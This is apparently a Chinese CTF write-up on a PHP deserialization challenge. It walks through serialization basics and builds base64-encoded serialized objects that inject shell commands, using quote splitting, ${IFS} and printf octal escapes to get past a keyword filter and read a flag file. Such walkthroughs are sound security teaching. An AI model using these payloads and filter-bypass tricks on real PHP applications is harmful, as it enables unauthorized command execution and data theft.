这道题在我看来是ctf-web方向第一阶段最难的题,涉及的知识点比较多,比较杂。
不过不当紧,方法总比困难多。
先打开题目场景,如图可知这是一道PHP序列化的题目:
第一步-先分析代码:
创建了一个类ease
function关键字用来自定义并声明函数,后跟函数名。
private私有的,声明对象只能在ease这个类中使用和进行访问,同样的public就是共有的意思。
定义了两个对象method和args。
this关键字的作用是在实例化对象的时候用来确定指向谁。
array用来创建数组。
call_user_func_array
->调用或者是指向的意思。
waf中过滤掉的字符有| & ; 空格 / cat flag tac php ls。到后面需要绕过。
wakeup中foreach是循环遍历的意思。
as 将遍历的数组内元素用一个替身变量来表示。
=>键值连接符
@忽略表达式可能产生的错误信息。
unserialize() 可以用此字符串来重建原始的变量值。
题目的切入点,最后怎么拿到flag,就是通过这个ctf变量发送POST用来请求数据。
不过这道题涉及到了PHP序列化的概念,有点复杂。
第二步-学习知识:
所以说我们在解题之前,需要先了解点知识点:
序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。
PHP序列化:将变量转换为可保存或传输的字符串的过程。
PHP序列化函数:serialize
参考实例:
=>在PHP中代表键对值,左边为键右边为值,和python中的字典相似,所以说编程语言之间有很多同性。
a是对象,3代表对象长度,你看a对应blue,b对应green,c对应red,正好是三个。
s代表str字符串类型,这个就不难理解吧,有双引号。
1是a这个变量名的长度,4是bule这个变量的长度,以此类推,举一反三。
第三步-解题步骤:
使method等于ping才可以进入下一步,需要注意的是这两个对象都是数组的形式,我们总要看看目录下都有什么东西吧,所以需要用到ls,但是ls被过滤了,所以我们就要用''单引号进行绕过。
所以传入method = ping ,args=ls。
定义一个变量a用来存放实例化后的结果,new是面向对象的意思,实例化ease类,这个类里面有很多方法,实例化后的结果存放在$a中。
随后用serialization函数序列化实例化后的$a,并存放到$b中。
输出$b并进行换行操作。
用base64编码格式输出序列化的$a,拿到payload:
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsJydzIjt9fQ==
通过payload数据流上传ctf参数。
用火狐浏览器Max HackBar工具上传ctf参数:
flag_1s_here的文件夹,我们得看看里面有什么东西,用ls列出该文件夹下的文件,但是部分字符被过滤了,我们还得进行绕过。
空格也被过滤了,需要用到${IFS}进行绕过。
${IFS}是分隔符的意思,所以可以有${IFS}进行空格的替代。
重新构造args可执行命令的值'l""s${IFS}fl""ag_1s_here',需要注意闭合,注意'',和""的位置。
拿到payload:
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyNDoibCIicyR7SUZTfWZsIiJhZ18xc19oZXJlIjt9fQ==
上传ctf参数:
flag_831b69012c67b35f.php文件,flag大概率就在这个php文件中了。想要拿到flag,就必须cat这个文件,cat是查看内容的意思,因为有过滤所以还得进行绕过。
cat flag_1s_here/flag_831b69012c67b35f.php
cat flag php都可以通过""双引号进行绕过,空格可以通过${IFS}进行绕过,\要用printf及$()绕过,以及水平制表符57对应ASCII码。
进行构造:
'c""at${IFS}f""lag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'
还是要注意闭合。
拿到payload:
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo3NDoiYyIiYXQke0lGU31mIiJsYWdfMXNfaGVyZSQocHJpbnRmJHtJRlN9Ilw1NyIpZiIibGFnXzgzMWI2OTAxMmM2N2IzNWYucCIiaHAiO319
上传ctf参数:
最终拿到flag:
大致思路看着是简单,但是这道题需要知道序列化,函数,过滤和绕过,参数上传等知识,综合比较强点。
有什么不懂的可以私聊我,才疏学浅,有什么不足,还望各位师傅指出,谢谢观看。